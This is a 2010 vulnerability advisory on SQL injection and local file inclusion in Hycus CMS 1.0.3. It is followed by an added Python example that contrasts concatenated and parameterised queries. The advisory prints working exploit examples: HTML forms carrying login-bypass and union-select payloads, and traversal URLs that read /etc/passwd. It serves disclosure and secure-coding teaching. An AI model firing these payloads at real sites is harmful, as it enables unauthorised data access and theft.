High-Tech Bridge, HTB22737
Dec 07, 2010 - 12:00 a.m.

Multiple Vulnerabilities in Hycus CMS

2010-12-07 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.007 (Low), percentile 80.9%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Hycus CMS which could be exploited to perform SQL injection attacks, gain access to sensitive information and compromise a vulnerable system.

  1. SQL injection vulnerabilities in Hycus CMS: CVE-2010-4612
    The vulnerability exists due to input sanitization errors in the "user_name", "usr_email", "q" and "useremail" parameters in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation examples:
    1.1
    <form action="http://[host]/?user/1/hregister.html" method="post" name="main">
    <input type="hidden" name="full_name" value="username"/>
    <input type="hidden" name="user_name" value="1'SQL_CODE"/>
    <input type="hidden" name="usr_email" value="[email protected]'SQL_CODE"/>
    <input type="hidden" name="pwd" value="123456"/>
    <input type="hidden" name="pwd2" value="123456"/>
    <input type="submit" value="submit" name="submit"/>
    </form>
    1.2
    <form action="http://[host]/?user/1/hlogin.html" method="post" name="main">
    <input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
    <input type="hidden" name="pwd" value="any"/>
    <input type="submit" value="submit" name="submit"/>
    </form>
    1.3
    <form action="http://[host]/?search/1.html" method="post" name="main">
    <input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/>
    <input type="submit" value="submit" name="submit"/>
    </form>
    1.4
    <form action="http://[host]/?user/1/forgotpass.html" method="post" name="main">
    <input type="hidden" name="useremail" value="1'SQL_CODE"/>
    <input type="submit" value="submit" name="submit"/>
    </form>

  2. Local file inclusion in Hycus CMS: CVE-2010-4613
    Input passed to the "site" parameter via index.php and admin.php is not properly sanitized before being used to include local files. A remote attacker can include arbitrary files on the target system using directory traversal sequences with a NULL byte.
    Exploitation examples:
    http://[host]/index.php?site=../../../../../../../etc/passwd%00
    http://[host]/admin.php?site=../../../../../../../etc/passwd%00
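
The root cause behind the four parameters in item 1, and its fix, shown as an added example (not code from the advisory or from Hycus CMS): a login lookup built by string concatenation next to the same lookup with bound parameters, run against an in-memory SQLite table. The table layout, function names and sample account are assumptions; the two input values are the ones quoted in examples 1.2 and 1.1.

```python
import sqlite3

# Values as they appear in the advisory's examples 1.2 and 1.1.
BYPASS_INPUT = "1' OR 1=1 -- 1"
STRAY_QUOTE_INPUT = "1'SQL_CODE"


def make_db():
    # Constructed stand-in table and account; the real Hycus CMS schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pwd TEXT)")
    db.execute("INSERT INTO users (email, pwd) VALUES (?, ?)",
               ("admin@example.test", "stored-password-hash"))
    return db


def login_concat(db, usr_email, pwd):
    # Flawed pattern: request values become part of the SQL text itself.
    sql = ("SELECT id FROM users WHERE email = '" + usr_email +
           "' AND pwd = '" + pwd + "'")
    return db.execute(sql).fetchone()


def login_bound(db, usr_email, pwd):
    # Corrected pattern: the statement is fixed, values are bound as data.
    sql = "SELECT id FROM users WHERE email = ? AND pwd = ?"
    return db.execute(sql, (usr_email, pwd)).fetchone()


def outcome(login, db, usr_email, pwd="any"):
    # Classify what the database did with the input.
    try:
        return "row returned" if login(db, usr_email, pwd) else "no row"
    except sqlite3.OperationalError:
        return "sql error"


if __name__ == "__main__":
    db = make_db()
    for value in (BYPASS_INPUT, STRAY_QUOTE_INPUT, "admin@example.test"):
        print(f"{value!r}: concat={outcome(login_concat, db, value)}, "
              f"bound={outcome(login_bound, db, value)}")
```

With bound parameters both inputs are compared as literal e-mail strings, so neither alters the query's logic nor surfaces a database error.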

CPE
Name | Operator | Version
hycus cms | le | 1.0.3
